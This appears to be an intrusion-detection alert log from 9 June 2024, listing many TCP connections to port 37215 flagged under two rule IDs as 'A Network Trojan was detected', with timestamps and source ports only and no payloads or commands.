          Timestamp:06/09/24-16:33:21.946433
          SID:2835222
          Source Port:58726
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993391
          SID:2829579
          Source Port:41054
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.097730
          SID:2835222
          Source Port:55242
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277275
          SID:2835222
          Source Port:49250
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904572
          SID:2835222
          Source Port:52034
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908823
          SID:2835222
          Source Port:55290
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306361
          SID:2829579
          Source Port:44876
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.922066
          SID:2835222
          Source Port:39586
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820782
          SID:2829579
          Source Port:47914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.897157
          SID:2829579
          Source Port:38316
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079207
          SID:2835222
          Source Port:33538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222822
          SID:2829579
          Source Port:44388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306629
          SID:2835222
          Source Port:38852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.952271
          SID:2835222
          Source Port:39500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719622
          SID:2835222
          Source Port:38986
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721064
          SID:2835222
          Source Port:33796
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.558370
          SID:2829579
          Source Port:42642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412537
          SID:2829579
          Source Port:53758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945589
          SID:2829579
          Source Port:60670
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225869
          SID:2829579
          Source Port:34174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914449
          SID:2835222
          Source Port:49236
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412737
          SID:2835222
          Source Port:38192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035931
          SID:2835222
          Source Port:48564
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.164270
          SID:2835222
          Source Port:43084
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687449
          SID:2829579
          Source Port:52690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206701
          SID:2835222
          Source Port:46556
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718696
          SID:2829579
          Source Port:49102
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713130
          SID:2829579
          Source Port:45128
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719835
          SID:2835222
          Source Port:46476
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274218
          SID:2829579
          Source Port:42914
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.892764
          SID:2835222
          Source Port:58304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280607
          SID:2829579
          Source Port:39772
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948883
          SID:2829579
          Source Port:41502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103310
          SID:2829579
          Source Port:55340
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079382
          SID:2829579
          Source Port:43374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821943
          SID:2829579
          Source Port:49940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029911
          SID:2835222
          Source Port:46878
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033207
          SID:2829579
          Source Port:35680
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930314
          SID:2835222
          Source Port:42450
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205527
          SID:2829579
          Source Port:36150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158293
          SID:2835222
          Source Port:43880
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.275854
          SID:2829579
          Source Port:47322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567365
          SID:2835222
          Source Port:47206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225710
          SID:2829579
          Source Port:57830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989936
          SID:2829579
          Source Port:52300
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929887
          SID:2829579
          Source Port:46882
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822638
          SID:2835222
          Source Port:37538
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.564171
          SID:2829579
          Source Port:45942
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930059
          SID:2835222
          Source Port:43708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.272038
          SID:2835222
          Source Port:50636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822448
          SID:2829579
          Source Port:56824
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286019
          SID:2829579
          Source Port:37146
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286687
          SID:2835222
          Source Port:57800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.166143
          SID:2835222
          Source Port:60368
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920944
          SID:2835222
          Source Port:46964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720519
          SID:2835222
          Source Port:50822
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.552809
          SID:2835222
          Source Port:42576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282352
          SID:2829579
          Source Port:46624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.821629
          SID:2829579
          Source Port:55376
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.222544
          SID:2829579
          Source Port:57134
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.986481
          SID:2835222
          Source Port:46056
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.289145
          SID:2835222
          Source Port:60708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.923002
          SID:2835222
          Source Port:57620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929687
          SID:2835222
          Source Port:58318
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.994768
          SID:2835222
          Source Port:48418
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718348
          SID:2829579
          Source Port:37846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.159446
          SID:2835222
          Source Port:37484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.869047
          SID:2829579
          Source Port:53616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904312
          SID:2835222
          Source Port:53174
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.930018
          SID:2829579
          Source Port:52096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931424
          SID:2835222
          Source Port:58132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.916756
          SID:2835222
          Source Port:41154
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.137965
          SID:2835222
          Source Port:60484
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.475178
          SID:2829579
          Source Port:35552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.029002
          SID:2829579
          Source Port:35708
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.466794
          SID:2829579
          Source Port:37440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.691938
          SID:2829579
          Source Port:47956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.272650
          SID:2835222
          Source Port:53584
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478221
          SID:2829579
          Source Port:39860
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.935433
          SID:2829579
          Source Port:43440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418925
          SID:2835222
          Source Port:54698
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031618
          SID:2829579
          Source Port:49712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644537
          SID:2829579
          Source Port:36838
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.474811
          SID:2829579
          Source Port:47014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478958
          SID:2829579
          Source Port:56050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.209762
          SID:2829579
          Source Port:46568
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.400207
          SID:2835222
          Source Port:54044
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.243909
          SID:2835222
          Source Port:47766
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.160998
          SID:2829579
          Source Port:55886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931418
          SID:2829579
          Source Port:34342
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248834
          SID:2829579
          Source Port:43304
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.120576
          SID:2829579
          Source Port:44770
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713111
          SID:2835222
          Source Port:54620
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206794
          SID:2829579
          Source Port:57188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.292770
          SID:2829579
          Source Port:50504
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.819703
          SID:2829579
          Source Port:50624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.478063
          SID:2829579
          Source Port:50352
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288926
          SID:2835222
          Source Port:38038
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.165531
          SID:2829579
          Source Port:54688
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103515
          SID:2835222
          Source Port:45076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.280495
          SID:2835222
          Source Port:59736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.948435
          SID:2835222
          Source Port:40118
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.646318
          SID:2829579
          Source Port:37232
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867759
          SID:2829579
          Source Port:47940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.079246
          SID:2835222
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862014
          SID:2835222
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866073
          SID:2835222
          Source Port:51306
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908804
          SID:2835222
          Source Port:47656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081871
          SID:2829579
          Source Port:57344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538681
          SID:2829579
          Source Port:39158
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600385
          SID:2829579
          Source Port:37228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253021
          SID:2829579
          Source Port:38632
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.419507
          SID:2835222
          Source Port:48644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568448
          SID:2829579
          Source Port:33468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472894
          SID:2829579
          Source Port:59458
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.161992
          SID:2829579
          Source Port:45338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.988854
          SID:2829579
          Source Port:37926
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.668532
          SID:2829579
          Source Port:58544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312634
          SID:2835222
          Source Port:49728
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820061
          SID:2829579
          Source Port:49758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568430
          SID:2829579
          Source Port:51338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010049
          SID:2835222
          Source Port:57550
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028428
          SID:2829579
          Source Port:59546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.296751
          SID:2829579
          Source Port:49356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.412046
          SID:2835222
          Source Port:49866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033203
          SID:2835222
          Source Port:45840
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.947669
          SID:2829579
          Source Port:39712
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.075556
          SID:2835222
          Source Port:41532
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718660
          SID:2835222
          Source Port:44808
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823266
          SID:2835222
          Source Port:47656
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.569281
          SID:2829579
          Source Port:48762
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.989400
          SID:2835222
          Source Port:40004
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.290218
          SID:2829579
          Source Port:50220
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.250598
          SID:2835222
          Source Port:34900
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.931312
          SID:2829579
          Source Port:49312
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.475915
          SID:2835222
          Source Port:57694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.085409
          SID:2829579
          Source Port:38752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284086
          SID:2829579
          Source Port:32924
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413530
          SID:2835222
          Source Port:58326
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397323
          SID:2829579
          Source Port:49800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223322
          SID:2829579
          Source Port:36960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718434
          SID:2835222
          Source Port:56164
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.283064
          SID:2835222
          Source Port:54264
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720505
          SID:2829579
          Source Port:45098
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721287
          SID:2829579
          Source Port:59968
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.540383
          SID:2835222
          Source Port:42398
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.230130
          SID:2829579
          Source Port:47440
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.397621
          SID:2835222
          Source Port:46374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206016
          SID:2835222
          Source Port:41522
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.163785
          SID:2829579
          Source Port:56452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926201
          SID:2835222
          Source Port:49080
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.282183
          SID:2829579
          Source Port:57946
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.416049
          SID:2829579
          Source Port:52356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904447
          SID:2835222
          Source Port:59454
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.948834
          SID:2829579
          Source Port:41536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248262
          SID:2829579
          Source Port:38730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.948276
          SID:2829579
          Source Port:56864
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.724276
          SID:2835222
          Source Port:47224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945697
          SID:2829579
          Source Port:51480
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599252
          SID:2829579
          Source Port:46668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.073947
          SID:2835222
          Source Port:53736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.914156
          SID:2829579
          Source Port:49570
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.312250
          SID:2835222
          Source Port:52964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.945555
          SID:2829579
          Source Port:39218
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.033045
          SID:2829579
          Source Port:59460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.942079
          SID:2829579
          Source Port:40068
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.926836
          SID:2829579
          Source Port:44386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.902068
          SID:2829579
          Source Port:60460
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715407
          SID:2835222
          Source Port:60422
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287945
          SID:2829579
          Source Port:47502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.129935
          SID:2835222
          Source Port:48806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718833
          SID:2829579
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.716621
          SID:2829579
          Source Port:53678
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.633948
          SID:2835222
          Source Port:42268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.559117
          SID:2829579
          Source Port:49852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081754
          SID:2829579
          Source Port:43078
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.718005
          SID:2829579
          Source Port:40338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.226483
          SID:2835222
          Source Port:38416
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.227423
          SID:2829579
          Source Port:33524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.917150
          SID:2835222
          Source Port:36782
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644342
          SID:2835222
          Source Port:55308
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.713828
          SID:2835222
          Source Port:48252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168826
          SID:2829579
          Source Port:33852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.418272
          SID:2835222
          Source Port:36866
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205653
          SID:2835222
          Source Port:54294
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.603634
          SID:2829579
          Source Port:37076
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.990744
          SID:2829579
          Source Port:60918
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.740998
          SID:2835222
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.169433
          SID:2835222
          Source Port:43500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.038310
          SID:2829579
          Source Port:50106
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.715082
          SID:2829579
          Source Port:40960
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028871
          SID:2835222
          Source Port:45640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302145
          SID:2829579
          Source Port:41008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.252424
          SID:2835222
          Source Port:38022
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721152
          SID:2835222
          Source Port:46916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.012772
          SID:2835222
          Source Port:36774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660439
          SID:2829579
          Source Port:49590
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.035849
